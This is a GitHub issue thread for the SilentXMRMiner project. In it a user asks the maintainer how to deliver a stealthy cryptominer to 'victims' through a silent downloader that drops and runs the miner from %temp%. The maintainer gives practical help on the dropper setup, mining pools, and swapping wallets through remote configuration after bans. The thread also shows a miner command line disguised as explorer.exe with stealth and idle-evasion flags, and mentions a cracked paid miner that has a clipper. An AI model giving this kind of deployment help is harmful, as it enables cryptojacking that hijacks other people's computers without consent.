### ISSUE TITLE
I saw some one uploading the services64.exe that would be in the %temp% folder and using the silent downloader.

### ISSUE THREAD

**Issue by Anox208** [UnamSanctam/SilentXMRMiner#413]
Will this work? I usually use the "miner.exe" file built by the miner builder and then upload It to Discord and then use the silent downloader to execute that but If I used the Services64.exe(usually created by miner.exe in %temp%) instead of the miner.exe will It still work? I think stealth increases by a lot this way.
MOREOVER, I wanted to mine both xmr and rvn. So I was thinking of using my usual settings for xmr. which is cpu 50% and idle 80%. but for rvn I wanted to disable cpu and use GPU only. Will this work. I am using SilentXMRMiner and not SilentETHMiner.

ALSO, DEFINITELY ADD ME IN DISCORD: SNova#2408

**Comment by UnamSanctam** [comment]
Any file name should work just fine. And yes using two SilentXMRMiners will work, you should use different "Start Delays" though.

**Comment by Anox208** [comment]
I am not talking about file name.

**Comment by Anox208** [comment]
https://i.ibb.co/mthCmX7/download.png

The down.exe is the silent downloader and the crack.exe is miner. I uploaded the crack.exe so that the downloader downloads and executes it.

**Comment by UnamSanctam** [comment]
Yes anything will work though you shouldn't use names that already exist, so you shouldn't for example name it "services64.exe" in the builder and then name the built file that as well since they would be called the same name.

**Comment by Anox208** [comment]
If the victim clicks on the down.exe then crack.exe will be downloaded to %temp%(my settings) and executed. Then there will be a Services64.exe in the %temp% like this. https://i.ibb.co/qrRGC8F/crack-exe.png
My question is what if I uploaded the services64.exe instead on the crack.exe(which I get from miner builder)

**Comment by UnamSanctam** [comment]
Then you would just upload the installed file instead, the miner just copies itself from where you execute it and just renames itself to whatever you entered in the "Install" options. So services64.exe and crack.exe are the same files with different names.

**Comment by Anox208** [comment]
Not run as Administrator, only non-administrator miners can be searched for.
Miners:
C:\WINDOWS\explorer.exe  --cinit-find-x -B --algo="rx/0" --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr  --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=xmrpool.eu:9999 --user=47PtopaCZsjTZabpzgP3Jj6rbk6LWBTZ3cADEHeHggANQtENN9GUMQrUKjRzS57C94aeHSrHX8oGpBmXr33PX2Er7XE1seW+New --pass= --cpu-max-threads-hint=60  --cinit-stealth-targets="+iU/trnPCTLD3p+slbva5u4EYOS6bvIPemCHGQx2WRUcnFdomWh6dhl5H5KbQCjp6yCYlsFu5LR1mi7nQAy56B+5doUwurAPvCael2sR/N4="  --cinit-idle-wait=5 --cinit-idle-cpu=90  --tls  --cinit-stealth
GPUs:
 NVIDIA GeForce GTX 1050 Ti NVIDIA GeForce GTX 1050 Ti
Compatible GPU found: True

https://i.ibb.co/Wy56Pc1/minerstats.png

ok I see they are the same file then. well, then I understand. Also if what pool should I use for rvn? Can I use RavenMiner https://old.ravenminer.com/

**Comment by UnamSanctam** [comment]
You can use that one, ethermines RVN pool or nanopool I guess. Not really sure which ones are the best.

**Comment by Anox208** [comment]
I personally use Ravenminer coz of low latency however I don't want to use the same pool coz I might get banned. Also have you seen phantom miner v3? It has some interesting settings. https://i.ibb.co/6XJT2Mc/phantom-miner.png
It has an option to add clipper as well and some other things. But overall I can't believe that one is paid even though not much difference? or not? mine is a cracked one tho.

**Comment by UnamSanctam** [comment]
You can use another Ravencoin wallet address and only that one would get banned if you do get banned. You could also use 'Remote Configuration' https://github.com/UnamSanctam/SilentXMRMiner/wiki#remote-configuration and change the pool/wallet address if you do ever get banned. And yeah Phantom Miner has less (or equal depending on how you value each feature) features overall, the cracked version should be the same one as the paid one.

**Comment by Anox208** [comment]
ok!!! Thnaks!!!!
